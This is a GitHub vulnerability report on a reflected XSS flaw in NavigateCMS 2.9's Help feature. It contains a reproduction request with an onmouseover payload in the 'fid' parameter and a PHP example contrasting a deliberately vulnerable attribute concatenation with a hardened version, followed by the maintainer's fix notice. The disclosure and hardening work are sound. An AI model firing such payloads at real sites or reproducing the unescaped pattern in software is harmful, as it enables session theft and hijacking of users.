NavigateCMS / Navigate-CMS

Navigate CMS, a very powerful open source content management system for everybody.
http://www.navigatecms.com
GNU General Public License v2.0

Reflected XSS attack on the Help feature in NavigateCMS 2.9 #23

Closed hydrasky-team closed 3 years ago

hydrasky-team commented 3 years ago

EXPECTED BEHAVIOUR An authenticated malicious user can take advantage of a Reflected XSS vulnerability in the Help feature.

IMPACT Commonly includes transmitting private data, such as cookies or other session information, to the attacker; redirecting the victim to web content controlled by the attacker; or performing other malicious operations on the user's machine under the guise of the vulnerable site.

VULNERABILITY CODE I found that the vulnerable code is in \lib\layout\layout.class.php


STEPS TO REPRODUCE

  1. We change the request

GET /navigate-2.9.3r1525/navigate/navigate.php?fid=%22onmouseover%3d%22alert(%27xss%27)%22%3b%22&act=edit&id=&tab=0&tab_language=&form-sent=true&id=&date_to_display=2021-06-04+01%3a27&date_published=&date_unpublish=&access=0&permission=0&item-author=1&item-author-text=admin&association[]=category&category=&embedding[]=1&template=content

  2. Log into your account

  3. Then, when people move the cursor to the Help feature, the reflected XSS is executed (no need to click).
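The attribute-context injection this report describes, as an added PHP illustration that is not NavigateCMS code: the project's actual markup in lib/layout/layout.class.php and the fix in core.php are not shown on this page, so the Help-link markup, the helper names and the choice of rawurlencode()/htmlspecialchars() as the hardening are all assumptions made for the example. The only input taken from the page is the fid value of the request above, URL-decoded.

```php
<?php
// Added example, not NavigateCMS code. The Help-link markup and helper names are
// invented to show the attribute-injection pattern reported in this issue.

// Vulnerable pattern (assumed): the request's "fid" parameter is concatenated
// straight into an attribute of the Help link. A value that starts with a double
// quote closes the href attribute, so the rest of the value becomes new
// attributes on the <a> element, here an onmouseover handler that fires as soon
// as the cursor touches the link, with no click required.
function help_link_vulnerable(string $fid): string
{
    return '<a class="help" href="navigate.php?fid=' . $fid . '">Help</a>';
}

// Hardened form (assumed fix, not necessarily the project's): encode the value
// for each context it passes through. rawurlencode() makes it a safe URL query
// value; htmlspecialchars() with ENT_QUOTES then makes the whole URL a safe
// attribute value, so neither " nor ' can terminate the attribute.
function help_link_safe(string $fid): string
{
    $url  = 'navigate.php?fid=' . rawurlencode($fid);
    $attr = htmlspecialchars($url, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<a class="help" href="' . $attr . '">Help</a>';
}

// Defence in depth: if fid is meant to be an identifier, validate it at the
// input boundary and drop anything else before it ever reaches a template.
function validated_fid(?string $fid): ?string
{
    if ($fid === null || !preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $fid)) {
        return null;
    }
    return $fid;
}

// The fid value from the reported request, URL-decoded (constructed input).
$payload = rawurldecode('%22onmouseover%3d%22alert(%27xss%27)%22%3b%22');

echo "Vulnerable: ", help_link_vulnerable($payload), PHP_EOL;
echo "Hardened:   ", help_link_safe($payload), PHP_EOL;
echo "Validated:  ", var_export(validated_fid($payload), true), PHP_EOL;
echo "Validated:  ", var_export(validated_fid('articles'), true), PHP_EOL;
```

Run it with `php example.php` and compare the two anchors. In the vulnerable output the browser sees a second attribute named `onmouseover` and treats it as a real event handler; in the hardened output the quotes survive only as `%22` inside the query string, so the value stays inside the attribute. After rawurlencode() there is nothing left for htmlspecialchars() to escape, but the second step is still worth keeping: it protects the attribute if another, non-URL-encoded value is ever concatenated into the same href.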

NavigateCMS commented 3 years ago

Fixed by 1dfcaa3909e797d4e5632df5a8dc38decc4bd2cf and b2937f5839f25b7c16a2533ea668c1b202e9fc0c (core.php file)

Thank you very much @hydrasky-team